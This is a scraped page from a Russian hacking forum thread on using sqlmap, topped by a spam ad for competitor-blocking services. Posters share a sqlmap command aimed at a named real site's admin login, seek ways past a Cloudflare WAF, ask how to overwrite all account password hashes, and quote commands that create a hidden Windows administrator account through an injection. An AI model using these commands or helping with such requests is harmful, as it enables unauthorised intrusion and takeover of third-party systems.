УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Вопросы по SQLMap

Страница 62 из 115

« Первая

112

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#611

14.02.2018, 01:52

erwerr2321

Флудер

Регистрация: 19.06.2015

Сообщений: 4,126

Провел на форуме:
759330

Репутация: 147

Цитата:

Сообщение от BabaDook

↑
Не хорошо по ру работать

угу)

Цитата:

Сообщение от BabaDook

↑
На счёт мод сека, тут надо уже ручками крутить ))

Мирослав же вроде пилил modsecurityzeroversioned.py, не?

#612

14.02.2018, 02:02

erwerr2321

Флудер

Регистрация: 19.06.2015

Сообщений: 4,126

Провел на форуме:
759330

Репутация: 147

Цитата:

Сообщение от BabaDook

↑
Да я не знаю, мне проще руками, sqlmap меня огорчил очень . он не делает то что нужно.

тож не знаю... то я загуглил.

Просто тема как бэ за его продукт - вот я и отписался, для тех пацанов, кто не в курсе!)

#613

14.02.2018, 03:13

The404

Новичок

Регистрация: 09.10.2016

Сообщений: 6

Провел на форуме:
1224

Репутация: 0

Цитата:

Сообщение от BabaDook

↑
Не хорошо по ру работать
sqlmap --random-agent -u '
http://dsm-print.ru/admin/admin.php
' --data='enter_admin=&admin_name=*&admin_password=' --dbs --is-dba
__________________________________________________ ____________________
На счёт мод сека, тут надо уже ручками крутить ))

По RU -да не вреда ради - просто очень инфа нужна - тото я гляжу сдесь половина ветки RU скулями забита....

Запрос не помог - а так если что - извиняюсь...

#614

01.03.2018, 06:08

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

Провел на форуме:
104689

Репутация: 1

Не как не могу раскрутить и за этого убогого WAF

Код:

[04:59:22] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests
[04:59:22] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 430 times, 414 (Request-URI Too Long) - 639 times
[04:59:22] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

Помогите

#615

01.03.2018, 06:34

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

Цитата:

Сообщение от Sensoft

↑
Не как не могу раскрутить и за этого убогого WAF

Код:

[04:59:22] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests
[04:59:22] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 430 times, 414 (Request-URI Too Long) - 639 times
[04:59:22] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

Помогите

Тебе лучше в тему Ваши вопросы по уязвимостям обратиться с этим вопросом, информации которую ты предоставил мало, она не чем не поможет в решении проблемы.

#616

01.03.2018, 08:52

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

Провел на форуме:
104689

Репутация: 1

Цитата:

Сообщение от cat1vo

↑
Тебе лучше в тему
Ваши вопросы по уязвимостям
обратиться с этим вопросом, информации которую ты предоставил мало, она не чем не поможет в решении проблемы.

Через sqlmap возможно клауд обойти ?

#617

01.03.2018, 12:33

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

Цитата:

Сообщение от Sensoft

↑
Через sqlmap возможно клауд обойти ?

Waf от CloudFlare можно, он насколько я помню не сильно сложный!

#618

01.03.2018, 13:00

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

Провел на форуме:
104689

Репутация: 1

Цитата:

Сообщение от cat1vo

↑
Waf от CloudFlare можно, он насколько я помню не сильно сложный!

я со скриптами пытался и не фига

#619

05.03.2018, 19:43

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

Провел на форуме:
104689

Репутация: 1

Есть SQL injection

Права Tru

Как мне поменять хешь на всех акках сразу ? так вообще возможно ?

Или хотя бы на один из любых

#620

08.03.2018, 15:31

dzhim2014

Новичок

Регистрация: 18.10.2013

Сообщений: 3

Провел на форуме:
1060

Репутация: 0

Цитата:

Сообщение от Siriak

↑
Все оказалась проще некуда, если у тебя права True
Через sqlmap прописал нового пользователя RDP командами
net user Admin Pass /add
net localgroup administrators Admin /add

хммм... очень интересно а как это заюзать? (если можно . то скрином покажите пожалуйста).

Страница 62 из 115

« Первая

112

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход